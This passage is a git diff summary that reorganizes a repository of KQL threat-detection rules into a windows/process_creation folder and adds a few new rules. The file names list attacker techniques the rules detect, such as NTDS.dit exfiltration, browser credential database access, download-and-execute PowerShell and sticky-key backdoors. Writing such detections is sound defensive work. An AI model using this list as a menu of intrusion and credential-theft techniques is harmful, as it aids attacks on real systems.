windows/process_creation}/remote_xsl_execution_via_msxsl_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remotely_hosted_hta_file_executed_via_mshta_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_autohotkey_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_boinc_client_execution.kql (100%) rename KQL/rules/{Credential Access => 
windows/process_creation}/renamed_browsercore_exe_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/renamed_cloudflared_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_createdump_utility_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_curl_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_ftp_exe_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/renamed_gpg_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_jusched_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_mavinject_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_megasync_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_microsoft_teams_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_msdt_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_nircmd_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_office_binary_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_pingcastle_binary_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_plink_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_procdump_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_psexec_service_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_remote_utilities_rat_rurat_execution.kql (100%) create mode 100644 KQL/rules/windows/process_creation/renamed_schtasks_execution.kql rename KQL/rules/{Resource Development => 
windows/process_creation}/renamed_sysinternals_debugview_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/renamed_sysinternals_sdelete_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/renamed_visual_studio_code_tunnel_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/renamed_vmnat_exe_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/renamed_whoami_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/replace_exe_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/response_file_execution_via_odbcconf_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/restrictedadminmode_registry_value_tampering_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/root_certificate_installed_from_susp_locations.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/ruby_inline_command_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/run_once_task_execution_as_configured_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/run_powershell_script_from_ads.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/run_powershell_script_from_redirected_input_stream.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_execution_with_uncommon_dll_extension.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_execution_without_commandline_parameters.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/rundll32_execution_without_parameters.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_installscreensaver_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/rundll32_registered_com_objects.kql (100%) rename 
KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_spawned_via_explorer_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_spawning_explorer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_unc_path_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/runmru_registry_key_deletion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/safeboot_registry_key_deleted_via_reg_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_creation_masquerading_as_system_processes.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/scheduled_task_creation_via_schtasks_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_executing_encoded_payload_from_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_executing_payload_from_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/schtasks_creation_or_modification_with_system_privileges.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/schtasks_from_suspicious_folders.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/screen_capture_activity_via_psr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/script_event_consumer_spawning_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/script_interpreter_execution_from_suspicious_folder.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/scripting_commandline_process_spawned_regsvr32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sdclt_child_processes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sdiagnhost_calling_suspicious_child_process.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/security_event_logging_disabled_via_minint_registry_key_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/security_privileges_enumeration_via_whoami_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/security_service_disabled_via_reg_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/security_tools_keyword_lookup_via_findstr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/sensitive_file_access_via_volume_shadow_copy_backup.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sensitive_file_dump_via_wbadmin_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/service_dacl_abuse_to_hide_services_via_sc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/service_registry_key_deleted_via_reg_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/service_security_descriptor_tampering_via_sc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_started_stopped_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_startuptype_change_via_powershell_set_service.kql (100%) rename 
KQL/rules/{Execution => windows/process_creation}/service_startuptype_change_via_sc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/set_suspicious_files_as_system_files_using_attrib_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/setup16_exe_execution_with_custom_lst_file.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/shadow_copies_creation_using_operating_systems_utilities.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/shadow_copies_deletion_using_operating_systems_utilities.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/share_and_session_enumeration_using_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/shell32_dll_execution_in_suspicious_directory.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/shell_process_spawned_by_java_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/shimcache_flush.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/sql_client_tools_powershell_session_detection.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sqlite_chromium_profile_data_db_access.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sqlite_firefox_profile_data_db_access.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/start_of_nt_virtual_dos_machine.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/start_windows_service_via_net_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/sticky_key_like_backdoor_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/stop_windows_service_via_net_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/stop_windows_service_via_powershell_stop_service.kql (100%) rename KQL/rules/{Impact => 
windows/process_creation}/stop_windows_service_via_sc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspect_svchost_activity.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_active_directory_database_snapshot_via_adexplorer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_advpack_call_via_rundll32_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_agentexecutor_powershell_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_autorun_registry_modified_via_wmi.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_binary_in_user_directory_spawned_from_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_bitlocker_access_agent_update_utility_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_cabinet_file_execution_via_msdt_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_calculator_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_certreq_command_to_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_child_process_created_as_system.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_child_process_of_aspnetcompiler.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_child_process_of_bginfo_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_child_process_of_manage_engine_servicedesk.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_child_process_of_sql_server.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_child_process_of_veeam_dabatase.kql (100%) rename KQL/rules/{Defense Evasion 
=> windows/process_creation}/suspicious_child_process_of_wermgr_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_chromium_browser_instance_executed_with_custom_extension.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_codepage_switch_via_chcp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_command_patterns_in_scheduled_task_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_control_panel_dll_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_copy_from_or_to_system_directory.kql (69%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_csi_exe_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_curl_exe_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_customshellhost_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_debugger_registration_cmdline.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_desktopimgdownldr_command.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_diantz_alternate_data_stream_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_diantz_download_and_compress_into_a_cab_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_dll_loaded_via_certoc_exe.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_double_extension_file_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_download_from_direct_ip_via_bitsadmin.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/suspicious_download_from_file_sharing_website_via_bitsadmin.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_download_from_office_domain.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_download_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_driver_dll_installation_via_odbcconf_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_driver_install_by_pnputil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_dumpminitool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_electron_application_child_processes.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_encoded_powershell_command_line.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_eventlog_clearing_or_configuration_change_activity.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_execution_from_outlook_temporary_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_execution_location_of_wermgr_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_execution_of_hostname.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_execution_of_installutil_without_log.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_execution_of_powershell_with_base64.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/suspicious_execution_of_shutdown.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/suspicious_execution_of_shutdown_to_log_out.kql (100%) rename KQL/rules/{Discovery => 
windows/process_creation}/suspicious_execution_of_systeminfo.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql (50%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_extrac32_alternate_data_stream_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_extrac32_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_characteristics_due_to_missing_fields.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_ip_via_curl_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_ip_via_wget_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_ip_via_wget_exe_paths.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_file_encoded_to_base64_via_certutil_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_execution_from_internet_hosted_webdav_share.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql (100%) rename KQL/rules/{Reconnaissance => 
windows/process_creation}/suspicious_git_clone.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_greedy_compression_using_rar_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_grpconv_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_gup_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_hh_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_high_integritylevel_conhost_legacy_option.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_hwp_sub_processes.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_iis_module_registration.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_invoke_webrequest_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_invoke_webrequest_execution_with_directip.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_javascript_execution_via_mshta_exe.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql rename KQL/rules/{Discovery => windows/process_creation}/suspicious_kernel_dump_using_dtrace.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_key_manager_access.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_lnk_command_line_padding_with_whitespace_characters.kql (100%) rename KQL/rules/{Collection => 
windows/process_creation}/suspicious_manipulation_of_default_accounts_via_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_microsoft_office_child_process.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_microsoft_onenote_child_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_modification_of_scheduled_tasks.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msbuild_execution_by_uncommon_parent_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msdt_parent_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_mshta_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_mshta_exe_execution_patterns.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msiexec_embedding_parent.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msiexec_execute_arbitrary_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msiexec_quiet_install_from_remote_location.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_mstsc_exe_execution_with_local_rdp_file.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_network_command.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_new_service_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_obfuscated_powershell_code.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_outlook_child_process.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/suspicious_parent_double_extension_file_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_ping_del_command_combination.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_plink_port_forwarding.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_download_and_execute_pattern.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_encoded_command_patterns.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_iex_execution_patterns.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_powershell_invocations_specific_processcreation.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/suspicious_powershell_mailbox_export_to_share.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_parameter_substring.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_parent_process.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_process_by_web_server_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_process_created_via_wmic_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_process_execution_from_fake_recycle_bin_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_process_masquerading_as_svchost_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_process_parents.kql (100%) rename KQL/rules/{Credential 
Access => windows/process_creation}/suspicious_process_patterns_ntds_dit_exfil.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_process_start_locations.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_processes_spawned_by_java_exe.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_processes_spawned_by_winrm.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_program_names.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_provlaunch_exe_child_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_query_of_machineguid.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rasdial_activity.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_rdp_redirect_using_tscon.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_recursive_takeown.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/suspicious_redirection_to_local_admin_share.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/suspicious_reg_add_bitlocker.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_reg_add_open_command.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_registry_modification_from_ads_via_regini_exe.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/suspicious_regsvr32_execution_from_remote_share.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_remote_child_process_from_outlook.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_response_file_execution_via_odbcconf_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_runas_like_flag_combination.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rundll32_activity_invoking_sys_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rundll32_execution_with_image_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_rundll32_invoking_inline_vbscript.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rundll32_setupapi_dll_activity.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_runscripthelper_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_scan_loop_network.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_scheduled_task_creation_involving_temp_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_scheduled_task_name_as_guid.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_schtasks_execution_appdata_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_schtasks_schedule_type_with_high_privileges.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_schtasks_schedule_types.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_screensave_change_by_reg_exe.kql (100%) 
rename KQL/rules/{Execution => windows/process_creation}/suspicious_script_execution_from_temp_folder.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_serv_u_process_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_service_binary_directory.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_service_dacl_modification_via_set_service_cmdlet.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_service_path_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_shellexec_rundll_call_via_ordinal.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_shells_spawn_by_java_utility_keytool.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_speech_runtime_binary_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_splwow64_without_params.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_spool_service_child_process.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_sysaidserver_child.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_system_user_process_creation.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_sysvol_domain_group_policy_access.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_tscon_start_as_system.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_ultravnc_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql (100%) 
create mode 100644 KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_usage_of_shellexec_rundll.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_use_of_csharp_interactive_console.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_use_of_psloglist.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_userinit_child_process.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_vboxdrvinst_exe_parameters.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_velociraptor_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_vsls_agent_command_with_agentextensionpath_load.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/suspicious_webdav_client_execution_via_rundll32_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_where_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_service_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_update_agent_empty_cmdline.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_windowsterminal_child_processes.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_wmic_execution_via_office_process.kql (100%) 
rename KQL/rules/{Execution => windows/process_creation}/suspicious_wmiprvse_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_workstation_locking_via_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_x509enrollment_process_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_xor_encoded_powershell_command.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_zipexec_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/syncappvpublishingserver_execute_arbitrary_powershell_code.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/sysinternals_psservice_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/sysinternals_pssuspend_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sysinternals_pssuspend_suspicious_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sysmon_configuration_update.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sysmon_driver_unloaded_via_fltmc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/sysprep_on_appdata_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/system_disk_and_volume_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/system_file_execution_location_anomaly.kql (57%) rename KQL/rules/{Discovery => windows/process_creation}/system_information_discovery_via_registry_queries.kql (55%) rename KQL/rules/{Discovery => 
